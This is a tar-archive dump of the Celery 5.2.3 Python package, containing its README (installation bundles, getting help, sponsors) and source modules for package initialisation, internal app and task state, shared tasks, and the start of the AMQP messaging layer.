backend (using ``pydocumentdb``) :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following,: :: $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. 
_celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. You can install the latest snapshot of these using the following pip commands: :: $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the Contributing section. .. _getting-help: Getting Help ============ .. _mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://libera.chat/ .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki Credits ======= .. _contributing-short: Contributors ------------ This project exists thanks to all the people who contribute. Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html |oc-contributors| .. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false :target: https://github.com/celery/celery/graphs/contributors Backers ------- Thank you to all our backers! 🙏 [`Become a backer`_] .. _`Become a backer`: https://opencollective.com/celery#backer |oc-backers| .. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 :target: https://opencollective.com/celery#backers Sponsors -------- Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [`Become a sponsor`_] .. _`Become a sponsor`: https://opencollective.com/celery#sponsor |oc-sponsors| .. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg :target: https://opencollective.com/celery/sponsor/0/website .. _license: License ======= This software is licensed under the `New BSD License`. See the ``LICENSE`` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround .. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg :alt: Build status :target: https://github.com/celery/celery/actions/workflows/python-package.yml .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. 
|wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Supported Python implementations. :target: https://pypi.org/project/celery/ .. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg :alt: Backers on Open Collective :target: #backers .. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg :alt: Sponsors on Open Collective :target: #sponsors .. |downloads| image:: https://pepy.tech/badge/celery :alt: Downloads :target: https://pepy.tech/project/celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756901.0 celery-5.2.3/README.rst0000664000175000017500000003643100000000000014373 0ustar00asifasif00000000000000.. image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| :Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor For enterprise ============== Available as part of the Tidelift Subscription. The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ for Node.js, a `PHP client`_, `gocelery`_ for golang, and rusty-celery_ for Rust. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _`gocelery`: https://github.com/gocelery/gocelery .. _rusty-celery: https://github.com/rusty-celery/rusty-celery What do I need? =============== Celery version 5.2.0 runs on, - Python (3.7, 3.8, 3.9, 3.10) - PyPy3.7 (7.3.7+) This is the version of celery which will support Python 3.7 or newer. 
If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4: Celery series 2.2 or earlier. - Python 2.7: Celery 4.x series. - Python 3.6: Celery 5.1 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters. Get Started =========== If this is the first time you're trying to use Celery, or you're new to Celery v5.2.0 coming from previous versions then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. Celery is... ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports... ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``) - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. 
_SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. _`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. 最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ .. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using ``pip``: :: $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the ``pip`` command-line by using brackets. Multiple bundles can be specified by separating them by commas. :: $ pip install "celery[amqp]" $ pip install "celery[amqp,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the ``eventlet`` pool. :``celery[gevent]``: for using the ``gevent`` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[amqp]``: for using the RabbitMQ amqp python library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport. :``celery[tblib``]: for using the ``task_remote_tracebacks`` feature. :``celery[memcache]``: for using Memcached as a result backend (using ``pylibmc``) :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with DataStax driver. :``celery[azureblockblob]``: for using Azure Storage as a result backend (using ``azure-storage``) :``celery[s3]``: for using S3 Storage as a result backend. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. 
:``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[cosmosdbsql]``: for using Azure Cosmos DB as a result backend (using ``pydocumentdb``) :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following,: :: $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. _celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. You can install the latest snapshot of these using the following pip commands: :: $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the Contributing section. .. _getting-help: Getting Help ============ .. _mailing-list: Mailing list ------------ For discussions about the usage, development, and future of Celery, please join the `celery-users`_ mailing list. .. _`celery-users`: https://groups.google.com/group/celery-users/ .. _irc-channel: IRC --- Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_ network. .. _`Libera Chat`: https://libera.chat/ .. _bug-tracker: Bug tracker =========== If you have any suggestions, bug reports, or annoyances please report them to our issue tracker at https://github.com/celery/celery/issues/ .. _wiki: Wiki ==== https://github.com/celery/celery/wiki Credits ======= .. _contributing-short: Contributors ------------ This project exists thanks to all the people who contribute. Development of `celery` happens at GitHub: https://github.com/celery/celery You're highly encouraged to participate in the development of `celery`. If you don't like GitHub (for some reason) you're welcome to send regular patches. Be sure to also read the `Contributing to Celery`_ section in the documentation. .. _`Contributing to Celery`: http://docs.celeryproject.org/en/master/contributing.html |oc-contributors| .. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false :target: https://github.com/celery/celery/graphs/contributors Backers ------- Thank you to all our backers! 🙏 [`Become a backer`_] .. _`Become a backer`: https://opencollective.com/celery#backer |oc-backers| .. 
|oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 :target: https://opencollective.com/celery#backers Sponsors -------- Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [`Become a sponsor`_] .. _`Become a sponsor`: https://opencollective.com/celery#sponsor |oc-sponsors| .. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg :target: https://opencollective.com/celery/sponsor/0/website .. _license: License ======= This software is licensed under the `New BSD License`. See the ``LICENSE`` file in the top distribution directory for the full license text. .. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround .. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg :alt: Build status :target: https://github.com/celery/celery/actions/workflows/python-package.yml .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Supported Python implementations. :target: https://pypi.org/project/celery/ .. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg :alt: Backers on Open Collective :target: #backers .. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg :alt: Sponsors on Open Collective :target: #sponsors .. |downloads| image:: https://pepy.tech/badge/celery :alt: Downloads :target: https://pepy.tech/project/celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/TODO0000664000175000017500000000012400000000000013362 0ustar00asifasif00000000000000Please see our Issue Tracker at GitHub: https://github.com/celery/celery/issues ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3477488 celery-5.2.3/celery/0000775000175000017500000000000000000000000014160 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756896.0 celery-5.2.3/celery/__init__.py0000664000175000017500000001353200000000000016275 0ustar00asifasif00000000000000"""Distributed Task Queue.""" # :copyright: (c) 2016-2026 Asif Saif Uddin, celery core and individual # contributors, All rights reserved. # :copyright: (c) 2015-2016 Ask Solem. All rights reserved. # :copyright: (c) 2012-2014 GoPivotal, Inc., All rights reserved. # :copyright: (c) 2009 - 2012 Ask Solem and individual contributors, # All rights reserved. # :license: BSD (3 Clause), see LICENSE for more details. import os import re import sys from collections import namedtuple # Lazy loading from . 
import local SERIES = 'dawn-chorus' __version__ = '5.2.3' __author__ = 'Ask Solem' __contact__ = 'auvipy@gmail.com' __homepage__ = 'http://celeryproject.org' __docformat__ = 'restructuredtext' __keywords__ = 'task job queue distributed messaging actor' # -eof meta- __all__ = ( 'Celery', 'bugreport', 'shared_task', 'Task', 'current_app', 'current_task', 'maybe_signature', 'chain', 'chord', 'chunks', 'group', 'signature', 'xmap', 'xstarmap', 'uuid', ) VERSION_BANNER = f'{__version__} ({SERIES})' version_info_t = namedtuple('version_info_t', ( 'major', 'minor', 'micro', 'releaselevel', 'serial', )) # bumpversion can only search for {current_version} # so we have to parse the version here. _temp = re.match( r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups() VERSION = version_info = version_info_t( int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '') del _temp del re if os.environ.get('C_IMPDEBUG'): # pragma: no cover import builtins def debug_import(name, locals=None, globals=None, fromlist=None, level=-1, real_import=builtins.__import__): glob = globals or getattr(sys, 'emarfteg_'[::-1])(1).f_globals importer_name = glob and glob.get('__name__') or 'unknown' print(f'-- {importer_name} imports {name}') return real_import(name, locals, globals, fromlist, level) builtins.__import__ = debug_import # This is never executed, but tricks static analyzers (PyDev, PyCharm, # pylint, etc.) into knowing the types of these symbols, and what # they contain. STATICA_HACK = True globals()['kcah_acitats'[::-1].upper()] = False if STATICA_HACK: # pragma: no cover from celery._state import current_app, current_task from celery.app import shared_task from celery.app.base import Celery from celery.app.task import Task from celery.app.utils import bugreport from celery.canvas import (chain, chord, chunks, group, # noqa maybe_signature, signature, subtask, xmap, xstarmap) from celery.utils import uuid # Eventlet/gevent patching must happen before importing # anything else, so these tools must be at top-level. def _find_option_with_arg(argv, short_opts=None, long_opts=None): """Search argv for options specifying short and longopt alternatives. Returns: str: value for option found Raises: KeyError: if option not found. """ for i, arg in enumerate(argv): if arg.startswith('-'): if long_opts and arg.startswith('--'): name, sep, val = arg.partition('=') if name in long_opts: return val if sep else argv[i + 1] if short_opts and arg in short_opts: return argv[i + 1] raise KeyError('|'.join(short_opts or [] + long_opts or [])) def _patch_eventlet(): import eventlet.debug eventlet.monkey_patch() blockdetect = float(os.environ.get('EVENTLET_NOBLOCK', 0)) if blockdetect: eventlet.debug.hub_blocking_detection(blockdetect, blockdetect) def _patch_gevent(): import gevent.monkey import gevent.signal gevent.monkey.patch_all() def maybe_patch_concurrency(argv=None, short_opts=None, long_opts=None, patches=None): """Apply eventlet/gevent monkeypatches. With short and long opt alternatives that specify the command line option to set the pool, this makes sure that anything that needs to be patched is completed as early as possible. (e.g., eventlet/gevent monkey patches). 
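    Example:
        A hypothetical invocation (the ``argv`` value is made up for
        illustration, and the eventlet patch only takes effect if
        eventlet is installed):

        >>> from celery import maybe_patch_concurrency
        >>> # made-up argv; '-P'/'--pool' select which pool gets patched
        >>> maybe_patch_concurrency(argv=['celery', 'worker', '-P', 'eventlet'])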
""" argv = argv if argv else sys.argv short_opts = short_opts if short_opts else ['-P'] long_opts = long_opts if long_opts else ['--pool'] patches = patches if patches else {'eventlet': _patch_eventlet, 'gevent': _patch_gevent} try: pool = _find_option_with_arg(argv, short_opts, long_opts) except KeyError: pass else: try: patcher = patches[pool] except KeyError: pass else: patcher() # set up eventlet/gevent environments ASAP from celery import concurrency if pool in concurrency.get_available_pool_names(): concurrency.get_implementation(pool) # this just creates a new module, that imports stuff on first attribute # access. This makes the library faster to use. old_module, new_module = local.recreate_module( # pragma: no cover __name__, by_module={ 'celery.app': ['Celery', 'bugreport', 'shared_task'], 'celery.app.task': ['Task'], 'celery._state': ['current_app', 'current_task'], 'celery.canvas': [ 'Signature', 'chain', 'chord', 'chunks', 'group', 'signature', 'maybe_signature', 'subtask', 'xmap', 'xstarmap', ], 'celery.utils': ['uuid'], }, __package__='celery', __file__=__file__, __path__=__path__, __doc__=__doc__, __version__=__version__, __author__=__author__, __contact__=__contact__, __homepage__=__homepage__, __docformat__=__docformat__, local=local, VERSION=VERSION, SERIES=SERIES, VERSION_BANNER=VERSION_BANNER, version_info_t=version_info_t, version_info=version_info, maybe_patch_concurrency=maybe_patch_concurrency, _find_option_with_arg=_find_option_with_arg, ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/__main__.py0000664000175000017500000000062100000000000016251 0ustar00asifasif00000000000000"""Entry-point for the :program:`celery` umbrella command.""" import sys from . import maybe_patch_concurrency __all__ = ('main',) def main(): """Entrypoint to the ``celery`` umbrella command.""" if 'multi' not in sys.argv: maybe_patch_concurrency() from celery.bin.celery import main as _main sys.exit(_main()) if __name__ == '__main__': # pragma: no cover main() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/_state.py0000664000175000017500000001164500000000000016020 0ustar00asifasif00000000000000"""Internal state. This is an internal module containing thread state like the ``current_app``, and ``current_task``. This module shouldn't be used directly. """ import os import sys import threading import weakref from celery.local import Proxy from celery.utils.threads import LocalStack __all__ = ( 'set_default_app', 'get_current_app', 'get_current_task', 'get_current_worker_task', 'current_app', 'current_task', 'connect_on_app_finalize', ) #: Global default app used when no current app. default_app = None #: Function returning the app provided or the default app if none. #: #: The environment variable :envvar:`CELERY_TRACE_APP` is used to #: trace app leaks. When enabled an exception is raised if there #: is no active app. app_or_default = None #: List of all app instances (weakrefs), mustn't be used directly. _apps = weakref.WeakSet() #: Global set of functions to call whenever a new app is finalized. #: Shared tasks, and built-in tasks are created by adding callbacks here. 
_on_app_finalizers = set() _task_join_will_block = False def connect_on_app_finalize(callback): """Connect callback to be called when any app is finalized.""" _on_app_finalizers.add(callback) return callback def _announce_app_finalized(app): callbacks = set(_on_app_finalizers) for callback in callbacks: callback(app) def _set_task_join_will_block(blocks): global _task_join_will_block _task_join_will_block = blocks def task_join_will_block(): return _task_join_will_block class _TLS(threading.local): #: Apps with the :attr:`~celery.app.base.BaseApp.set_as_current` attribute #: sets this, so it will always contain the last instantiated app, #: and is the default app returned by :func:`app_or_default`. current_app = None _tls = _TLS() _task_stack = LocalStack() #: Function used to push a task to the thread local stack #: keeping track of the currently executing task. #: You must remember to pop the task after. push_current_task = _task_stack.push #: Function used to pop a task from the thread local stack #: keeping track of the currently executing task. pop_current_task = _task_stack.pop def set_default_app(app): """Set default app.""" global default_app default_app = app def _get_current_app(): if default_app is None: #: creates the global fallback app instance. from celery.app.base import Celery set_default_app(Celery( 'default', fixups=[], set_as_current=False, loader=os.environ.get('CELERY_LOADER') or 'default', )) return _tls.current_app or default_app def _set_current_app(app): _tls.current_app = app if os.environ.get('C_STRICT_APP'): # pragma: no cover def get_current_app(): """Return the current app.""" raise RuntimeError('USES CURRENT APP') elif os.environ.get('C_WARN_APP'): # pragma: no cover def get_current_app(): import traceback print('-- USES CURRENT_APP', file=sys.stderr) # + traceback.print_stack(file=sys.stderr) return _get_current_app() else: get_current_app = _get_current_app def get_current_task(): """Currently executing task.""" return _task_stack.top def get_current_worker_task(): """Currently executing task, that was applied by the worker. This is used to differentiate between the actual task executed by the worker and any task that was called within a task (using ``task.__call__`` or ``task.apply``) """ for task in reversed(_task_stack.stack): if not task.request.called_directly: return task #: Proxy to current app. current_app = Proxy(get_current_app) #: Proxy to current task. 
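# Usage sketch (assumption: evaluated inside a running task so both proxies
# resolve to something meaningful)::
#
#     from celery import current_app, current_task
#
#     current_app.conf.task_default_queue   # the active app's configuration
#     current_task.request.id               # the executing task's request id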
current_task = Proxy(get_current_task) def _register_app(app): _apps.add(app) def _deregister_app(app): _apps.discard(app) def _get_active_apps(): return _apps def _app_or_default(app=None): if app is None: return get_current_app() return app def _app_or_default_trace(app=None): # pragma: no cover from traceback import print_stack try: from billiard.process import current_process except ImportError: current_process = None if app is None: if getattr(_tls, 'current_app', None): print('-- RETURNING TO CURRENT APP --') # + print_stack() return _tls.current_app if not current_process or current_process()._name == 'MainProcess': raise Exception('DEFAULT APP') print('-- RETURNING TO DEFAULT APP --') # + print_stack() return default_app return app def enable_trace(): """Enable tracing of app instances.""" global app_or_default app_or_default = _app_or_default_trace def disable_trace(): """Disable tracing of app instances.""" global app_or_default app_or_default = _app_or_default if os.environ.get('CELERY_TRACE_APP'): # pragma: no cover enable_trace() else: disable_trace() ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.3717492 celery-5.2.3/celery/app/0000775000175000017500000000000000000000000014740 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/__init__.py0000664000175000017500000000463300000000000017057 0ustar00asifasif00000000000000"""Celery Application.""" from celery import _state from celery._state import (app_or_default, disable_trace, enable_trace, pop_current_task, push_current_task) from celery.local import Proxy from .base import Celery from .utils import AppPickler __all__ = ( 'Celery', 'AppPickler', 'app_or_default', 'default_app', 'bugreport', 'enable_trace', 'disable_trace', 'shared_task', 'push_current_task', 'pop_current_task', ) #: Proxy always returning the app set as default. default_app = Proxy(lambda: _state.default_app) def bugreport(app=None): """Return information useful in bug reports.""" return (app or _state.get_current_app()).bugreport() def shared_task(*args, **kwargs): """Create shared task (decorator). This can be used by library authors to create tasks that'll work for any app environment. Returns: ~celery.local.Proxy: A proxy that always takes the task from the current apps task registry. Example: >>> from celery import Celery, shared_task >>> @shared_task ... def add(x, y): ... return x + y ... >>> app1 = Celery(broker='amqp://') >>> add.app is app1 True >>> app2 = Celery(broker='redis://') >>> add.app is app2 True """ def create_shared_task(**options): def __inner(fun): name = options.get('name') # Set as shared task so that unfinalized apps, # and future apps will register a copy of this task. _state.connect_on_app_finalize( lambda app: app._task_from_fun(fun, **options) ) # Force all finalized apps to take this task as well. for app in _state._get_active_apps(): if app.finalized: with app._finalize_mutex: app._task_from_fun(fun, **options) # Return a proxy that always gets the task from the current # apps task registry. 
def task_by_cons(): app = _state.get_current_app() return app.tasks[ name or app.gen_task_name(fun.__name__, fun.__module__) ] return Proxy(task_by_cons) return __inner if len(args) == 1 and callable(args[0]): return create_shared_task(**kwargs)(args[0]) return create_shared_task(*args, **kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/amqp.py0000664000175000017500000005471100000000000016260 0ustar00asifasif00000000000000"""Sending/Receiving Messages (Kombu integration).""" import numbers from collections import namedtuple from collections.abc import Mapping from datetime import timedelta from weakref import WeakValueDictionary from kombu import Connection, Consumer, Exchange, Producer, Queue, pools from kombu.common import Broadcast from kombu.utils.functional import maybe_list from kombu.utils.objects import cached_property from celery import signals from celery.utils.nodenames import anon_nodename from celery.utils.saferepr import saferepr from celery.utils.text import indent as textindent from celery.utils.time import maybe_make_aware from . import routes as _routes __all__ = ('AMQP', 'Queues', 'task_message') #: earliest date supported by time.mktime. INT_MIN = -2147483648 #: Human readable queue declaration. QUEUE_FORMAT = """ .> {0.name:<16} exchange={0.exchange.name}({0.exchange.type}) \ key={0.routing_key} """ task_message = namedtuple('task_message', ('headers', 'properties', 'body', 'sent_event')) def utf8dict(d, encoding='utf-8'): return {k.decode(encoding) if isinstance(k, bytes) else k: v for k, v in d.items()} class Queues(dict): """Queue name⇒ declaration mapping. Arguments: queues (Iterable): Initial list/tuple or dict of queues. create_missing (bool): By default any unknown queues will be added automatically, but if this flag is disabled the occurrence of unknown queues in `wanted` will raise :exc:`KeyError`. max_priority (int): Default x-max-priority for queues with none set. """ #: If set, this is a subset of queues to consume from. #: The rest of the queues are then used for routing only. _consume_from = None def __init__(self, queues=None, default_exchange=None, create_missing=True, autoexchange=None, max_priority=None, default_routing_key=None): super().__init__() self.aliases = WeakValueDictionary() self.default_exchange = default_exchange self.default_routing_key = default_routing_key self.create_missing = create_missing self.autoexchange = Exchange if autoexchange is None else autoexchange self.max_priority = max_priority if queues is not None and not isinstance(queues, Mapping): queues = {q.name: q for q in queues} queues = queues or {} for name, q in queues.items(): self.add(q) if isinstance(q, Queue) else self.add_compat(name, **q) def __getitem__(self, name): try: return self.aliases[name] except KeyError: return super().__getitem__(name) def __setitem__(self, name, queue): if self.default_exchange and not queue.exchange: queue.exchange = self.default_exchange super().__setitem__(name, queue) if queue.alias: self.aliases[queue.alias] = queue def __missing__(self, name): if self.create_missing: return self.add(self.new_missing(name)) raise KeyError(name) def add(self, queue, **kwargs): """Add new queue. The first argument can either be a :class:`kombu.Queue` instance, or the name of a queue. If the former the rest of the keyword arguments are ignored, and options are simply taken from the queue instance. Arguments: queue (kombu.Queue, str): Queue to add. 
